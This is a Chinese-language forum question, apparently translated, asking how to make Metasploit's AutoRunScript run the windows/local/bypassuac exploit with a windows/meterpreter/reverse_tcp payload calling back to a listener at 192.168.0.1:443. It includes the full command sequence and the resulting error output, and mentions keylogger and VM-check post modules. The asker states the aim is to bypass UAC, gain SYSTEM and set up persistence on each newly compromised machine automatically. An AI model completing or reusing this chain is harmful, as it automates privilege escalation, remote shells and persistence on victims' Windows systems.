有没有办法使用 AutoRunScript 来运行需要参数的漏洞利用,例如标题中的那个?
我能够使用 AutoRunScript 完美地执行一些 post 命令,例如keylog_recorder
或checkvm
.
但是当我添加我的脚本时:
use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit
我懂了:
[*] Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*] Running command set TARGET 0
[-] Unknown command: set.
[*] Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.
显然我在这里遗漏了一些东西。我怎样才能做到这一点?我的目标是能够绕过 UAC,使用 getsystem,然后使用持久性选项获得立足点。
作为旁注,我知道使用“set SESSION 1”仅适用于参与的第一台计算机。我需要以某种方式使用变量来引用当前正在启动的会话。
有人对此有任何解决方案吗?